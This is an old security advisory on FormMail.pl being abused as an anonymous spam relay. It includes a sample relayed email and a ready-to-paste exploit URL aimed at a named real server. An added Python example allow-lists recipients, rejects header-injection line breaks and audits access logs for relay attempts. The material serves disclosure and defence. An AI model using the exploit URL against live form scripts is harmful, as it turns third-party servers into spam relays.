Vulnerability
FormMail.pl
Affected
FormMail
Description
Michael Rawls found the following. He did a little playing with
FormMail.pl after a run-in with a spammer abusing his webserver.
Apparently ALL FormMail.pl cgi-bin scripts can be used to spam
anonymously. He found another server with FormMail.pl and tried
the same exploit to send himself an email, and it worked.
The email will not show the spammer's real IP; only the web
server's IP will show. The web server logs will, however, show the
true IP address of the spammer.
Actual example of email sent:
Return-Path: <apache@hum.auc.dk>
Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
for <spam-l@shadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
id 14bta3-0004tP-00
for spam-l@shadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
To: spam-l@shadowstorm.com
From: ()
Subject: WWW Form Submission
Message-Id: <E14bta3-0004tP-00@hercules.humfak.auc.dk>
Date: Sun, 11 Mar 2001 01:19:27 +0100
X-UIDL: TPj"!bg3"!i:T!!=FU"!
Below is the result of your feedback form. It was submitted by
() on Sunday, March 11, 2001 at 01:19:27
---------------------------------------------------------------------------
message: Proof that FormMail.pl can be used to send anonymous spam.
---------------------------------------------------------------------------
Paste the line below into your web browser's URL box as one long
single line, insert your email address in place of
"email@address-to-spam.com", and press enter. Now go check your
email:
http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam
The address "www.hum.auc.dk" can be replaced with the address of
ANY webserver set up to use FormMail.pl.
Solution
There are a few ways to get around this. Firewall the IP address
of the spammer. The best(?) way is (if/where possible) to
hard-code the recipient address into the installation.
Patching FormMail to check the referrer is NOT ample security. It
takes about 30 seconds to write a Perl script to POST to
FormMail.pl with a faked HTTP_REFERER field. Probably the only
useful solution is to hack the script to use an array of valid
email addresses to send to, rather than an array of valid domains
to send from.
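The recipient allow-list the Solution calls for, together with an audit of the web server log that the Description says still records the spammer's real IP, as an added Python example; it is not part of the original advisory and not FormMail.pl's own code. The allow-listed addresses, the script path /cgi-bin/FormMail.pl, and the Apache-style log lines are constructed for the example.

```python
"""Recipient allow-list and access-log audit for a FormMail-style
form-to-mail CGI (added example; not FormMail.pl's own code).

Constructed assumptions: the script is served at /cgi-bin/FormMail.pl, the
target address arrives in a `recipient` parameter (comma-separated, as in
FormMail), and the web server writes Apache common-log-format lines.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list: the only addresses the form may deliver to.
# Matching full addresses (not just domains) is the point: a domain-only
# check still relays to any mailbox at an allowed domain.
ALLOWED_RECIPIENTS = {"webmaster@example.org", "sales@example.org"}

SCRIPT_PATH = "/cgi-bin/FormMail.pl"  # constructed; adjust to the install


def recipient_allowed(recipient, allowed=ALLOWED_RECIPIENTS):
    """True only if `recipient` exactly matches an allow-listed address."""
    if recipient is None:
        return False
    addr = recipient.strip().lower()
    # A CR/LF inside the value would let extra header lines (Bcc:, ...)
    # ride into the generated mail, so it is refused outright.
    if "\r" in addr or "\n" in addr:
        return False
    return addr in {a.lower() for a in allowed}


def permitted_recipients(raw_value, allowed=ALLOWED_RECIPIENTS):
    """Split FormMail's comma-separated `recipient` value and keep only the
    allow-listed addresses. An empty result means: do not send at all."""
    if not raw_value:
        return []
    return [r.strip().lower() for r in raw_value.split(",")
            if recipient_allowed(r, allowed)]


# Apache common log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<date>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def audit_access_log(lines, allowed=ALLOWED_RECIPIENTS, script=SCRIPT_PATH):
    """Return [(client_ip, recipient)] for every logged request to the
    script whose recipient parameter is outside the allow-list.

    Only GET requests expose the parameter in the logged URL; a POSTed body
    is not in the access log, so POST abuse needs the script's own logging.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != script:
            continue
        for raw in parse_qs(url.query).get("recipient", []):
            for r in raw.split(","):
                if not recipient_allowed(r, allowed):
                    hits.append((m.group("host"), r.strip()))
    return hits


# Constructed log lines: one relay attempt, one legitimate submission, one
# unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Mar/2001:01:19:27 +0100] "GET /cgi-bin/FormMail.pl'
    '?recipient=victim@example.net&message=Proof HTTP/1.0" 200 512',
    '198.51.100.4 - - [11/Mar/2001:01:20:02 +0100] "GET /cgi-bin/FormMail.pl'
    '?recipient=webmaster@example.org&subject=hello HTTP/1.0" 200 512',
    '192.0.2.9 - - [11/Mar/2001:01:21:40 +0100] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    print("permitted:", permitted_recipients("sales@example.org,victim@example.net"))
    for ip, rcpt in audit_access_log(SAMPLE_LOG):
        print(f"relay attempt from {ip} to {rcpt}")
```

The check is an exact match on the whole address, which is what "an array of valid email addresses to send to" amounts to; a domain-only list would still relay to every mailbox at that domain. The audit is the log-side counterpart: it turns the access log into the list of client IPs that tried to relay, which is what the firewall step needs.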